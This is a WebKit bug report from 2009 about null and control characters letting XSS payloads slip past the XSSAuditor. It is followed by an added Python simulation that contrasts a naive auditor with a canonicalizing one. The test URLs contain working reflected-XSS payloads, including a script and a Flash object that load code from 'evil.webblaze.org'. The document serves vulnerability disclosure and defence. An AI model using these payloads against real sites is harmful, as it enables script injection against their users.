[Webkit-unassigned] [Bug 27151] New: [XSSAuditor] JavaScript URLs with null/control characters bypass XSSAuditor

bugzilla-daemon at webkit.org
Fri Jul 10 11:16:18 PDT 2009


https://bugs.webkit.org/show_bug.cgi?id=27151

           Summary: [XSSAuditor] JavaScript URLs with null/control
                    characters bypass XSSAuditor
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: All
        OS/Version: All
            Status: UNCONFIRMED
          Severity: Normal
          Priority: P2
         Component: WebCore Misc.
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: dbates at berkeley.edu
                CC: sam at webkit.org, abarth at webkit.org, dbates at berkeley.edu


Null/control characters in HTTP GET/POST data can bypass XSSAuditor with
respect to JavaScript URLs.

Examples:

JavaScript URL with Null Character:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aal%00ert%28/XSS/%29%3EContinue%3C/a%3E

JavaScript URL with Control Character:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aalert%28/XSS%05/%29%3EContinue%3C/a%3E

+++ This bug was initially created as a clone of Bug #27071 +++

Null/control characters in HTTP GET/POST data can bypass XSSAuditor with
respect to injected plugin-based objects, inline event handlers, and external
scripts.

Examples:

Plugin-Injection:
http://good.webblaze.org/dbates/xsstest.php?q=%3Cobject%20classid=%22clsid:d27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase=%22http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab%22%20id=%22flashMov%22%3E%3Cparam%20name=%22movie%22%20value=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cembed%20src=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20name=%22flashMov%22%20allowScriptAccess=%22always%22%20type=%22application/x-shockwave-flash%22%20/%3E%3C/object%3E

Inline Event Handler:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E

External Scripts:
http://good.webblaze.org/dbates/xsstest.php?q=<script src='http://evil.webblaze.org/dbates/xss.js'></script>

-- 
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
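The report above shows reflected payloads that the page executes even though the raw request data never contains the literal `javascript:alert(...)` or `alert(5)` that the auditor is looking for. The following is an added illustration, not WebKit code and not the reporter's: a toy reflected-XSS auditor that extracts inline script from the echoed markup and compares it with the request parameter, first byte-for-byte and then after canonicalization (dropping NUL and C0 control characters and case-folding). It assumes, as a model of the behaviour the report describes, that the HTML tokenizer discards NUL/control characters inside attribute values, so the fragment the page executes differs from the bytes the request carried. The hypothetical functions `simulate`, `naive_auditor` and `canonical_auditor` are mine; the `q=` values are the ones from the report's test URLs.

```python
import re
from urllib.parse import unquote_plus

# Added example (not WebKit code): a toy reflected-XSS auditor that compares
# inline script found in the response against the reflected request parameter,
# first byte-for-byte and then after canonicalization.
# Assumption: the HTML tokenizer drops NUL and C0 control characters inside
# attribute values, so the page executes 'javascript:alert(/XSS/)' even though
# the request carried 'javascript:al\x00ert(/XSS/)'.

CONTROL = re.compile(r"[\x00-\x1f\x7f]")
JS_SCHEME = re.compile(r"^\s*javascript:", re.IGNORECASE)
# Attributes that can carry inline script: javascript: hrefs and on* handlers.
SCRIPT_ATTR = re.compile(
    r'\b(href|on\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]*))', re.IGNORECASE)


def tokenized_attr_value(raw: str) -> str:
    """Value the tokenizer hands to the script/URL machinery (assumption above)."""
    return CONTROL.sub("", raw)


def canonicalize(s: str) -> str:
    """Normalize before matching: drop NUL/control characters and case-fold."""
    return CONTROL.sub("", s).lower()


def inline_scripts(markup: str) -> list[str]:
    """Inline script fragments a tokenizer would extract from the markup."""
    found = []
    for m in SCRIPT_ATTR.finditer(markup):
        name = m.group(1).lower()
        value = next(g for g in m.groups()[1:] if g is not None)
        value = tokenized_attr_value(value)
        if name.startswith("on") or JS_SCHEME.match(value):
            found.append(value)
    return found


def naive_auditor(request_param: str, script: str) -> bool:
    """Block when the executed fragment appears verbatim in the request."""
    return script in request_param


def canonical_auditor(request_param: str, script: str) -> bool:
    """Same policy, but both sides are canonicalized first."""
    return canonicalize(script) in canonicalize(request_param)


def simulate(query_value: str, canonical: bool = False) -> bool:
    """Return True if the chosen auditor blocks the reflected payload."""
    param = unquote_plus(query_value)  # the server echoes the decoded value
    auditor = canonical_auditor if canonical else naive_auditor
    return any(auditor(param, s) for s in inline_scripts(param))


# Constructed inputs: the q= values taken from the report's test URLs.
NULL_IN_JS_URL = "%3Ca+href%3Djavascript%3Aal%00ert%28/XSS/%29%3EContinue%3C/a%3E"
CTRL_IN_JS_URL = "%3Ca+href%3Djavascript%3Aalert%28/XSS%05/%29%3EContinue%3C/a%3E"
NULL_IN_HANDLER = "%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E"
PLAIN_JS_URL = "%3Ca+href%3Djavascript%3Aalert%28/XSS/%29%3EContinue%3C/a%3E"

if __name__ == "__main__":
    cases = [("NUL in javascript: URL", NULL_IN_JS_URL),
             ("control char in javascript: URL", CTRL_IN_JS_URL),
             ("NUL in onclick handler", NULL_IN_HANDLER),
             ("plain javascript: URL", PLAIN_JS_URL)]
    for label, q in cases:
        print(f"{label}: naive={simulate(q)} canonical={simulate(q, True)}")
```

The byte-for-byte auditor misses the first three cases because the fragment it sees after tokenization (`alert(...)`) is not a substring of the request, which still contains the injected NUL or `\x05`; canonicalizing both sides before the comparison closes that gap without changing the policy. Any real auditor must apply the same normalization the parser applies, for every context it inspects (URLs, handlers, plugin parameters, external script sources), or the two views of the same data will disagree.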
